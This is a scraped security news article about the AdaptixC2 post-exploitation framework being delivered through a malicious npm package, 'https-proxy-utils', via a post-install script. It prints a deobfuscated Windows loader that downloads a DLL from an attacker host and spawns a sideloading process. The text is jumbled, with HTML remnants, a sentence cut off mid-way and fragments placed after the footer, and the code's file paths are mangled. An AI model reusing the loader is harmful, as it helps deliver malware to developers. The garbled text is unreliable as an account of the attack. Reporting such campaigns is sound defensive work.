The emergence of the AdaptixC2 post-exploitation framework in 2025 marked a significant milestone in the evolution of attacker toolsets targeting open-source supply chains.<\/p>\n
Positioning itself as a formidable alternative to established tools like Cobalt Strike, AdaptixC2 quickly attracted threat actors seeking agility and stealth in post-exploitation scenarios.<\/p>\n
This October, researchers uncovered its delivery through the npm package registry\u2014a supply chain attack targeting developers and organizations reliant on Node.js modules for critical infrastructure and application development.<\/p>\n
The incident revolved around a deceptive npm package named The threat actors cloned proxy-related features from popular modules, ensuring the malicious package appeared both useful and harmless.<\/p>\n Upon installation, however, the package executed a post-install script designed to download and deploy the AdaptixC2 agent onto the victim\u2019s system, initiating a stealthy foothold for remote access and broader exploitation.<\/p>\n Securelist researchers were the first to identify<\/a> and analyze the AdaptixC2 npm infection, noting both the technical sophistication of the attack and its alarming implications for open-source threat landscapes.<\/p>\n As the npm ecosystem grows, attackers are increasingly exploiting its trust and wide reach. The discovery highlights the persistent risk posed by supply chain attacks, emphasizing the need for vigilant vetting and continuous monitoring<\/a> of open-source components.<\/p>\n A standout feature of the AdaptixC2 npm campaign<\/a> is its tailored infection strategy for multiple operating systems. Once the malicious package executes, it detects the host OS and deploys the payload using methods designed for Windows, macOS, or Linux.<\/p>\n For Windows, the code sideloads the agent as a DLL<\/a> alongside a legitimate executable, using JavaScript scripting to spawn the compromised process.<\/p>\n Below is a deobfuscated snippet employed for Windows deployment:-<\/p>\n This flexible approach extends across macOS and Linux systems, employing autorun configuration and architecture-specific binary delivery to ensure persistent control.<\/p>\n Such OS-targeted infection routines deepen the framework\u2019s ability to evade conventional detection, broadening its scope for exploitation across diverse environments.<\/p>\n Follow us on\u00a0Google News<\/a>,\u00a0LinkedIn<\/a>,\u00a0and\u00a0X<\/a>\u00a0to Get More Instant Updates<\/strong>,\u00a0Set CSN as a Preferred Source in\u00a0Google<\/a>.<\/strong><\/p>\n The post Threat Actors Leverage npm Ecosystem to Deliver AdaptixC2 Post-Exploitation Framework<\/a> appeared first on Cyber Security News<\/a>.<\/p>\n<\/div>\nhttps-proxy-utils<\/code>, which mimicked the functionality and naming conventions of widely used legitimate libraries such as http-proxy-agent<\/code>.<\/p>\nInfection Mechanism: OS-Specific Adaptation<\/strong><\/h2>\n
![\"\"](\"https:\/\/i0.wp.com\/blogger.googleusercontent.com\/img\/b\/R29vZ2xl\/AVvXsEjqgG9uhCh4_wtLZEzQvVPNu70BP9nx68D8Ohwbw7jgufDzrv-f_BJxj0WUlWXmGHuMdOASkPqheq8Eb-I1i6i7JAblhQhq1LAN5pF7vhO0CIo9hJVPc3Vod8HPwmZ7qwiL0fWK-1HtIQqUDaCrL-TGicD1i2gi2gjjUvsSX10iIngHMghYN4i4jVTRtGw\/s16000\/Metadata%2520for%2520the%2520malicious%2520%28left%29%2520and%2520legitimate%2520%28right%29%2520packages%2520%28Source%2520-%2520Securelist%29.webp?ssl=1\")
async function onWindows() {\n const url = 'https:\/\/cloudcenter.topsysupdate';\n const dllPath = 'C:\\.dll';\n const systemMsdtc = 'C:\\32.exe';\n const tasksMsdtc = 'C:\\.exe';\n try {\n await downloadFile(url, dllPath);\n fs.copyFileSync(systemMsdtc, tasksMsdtc);\n const child = spawn(tasksMsdtc, [], { detached: true, stdio: 'ignore' });\n child.unref();\n } catch (err) {\n console.error(err);\n }\n}<\/code><\/pre>\n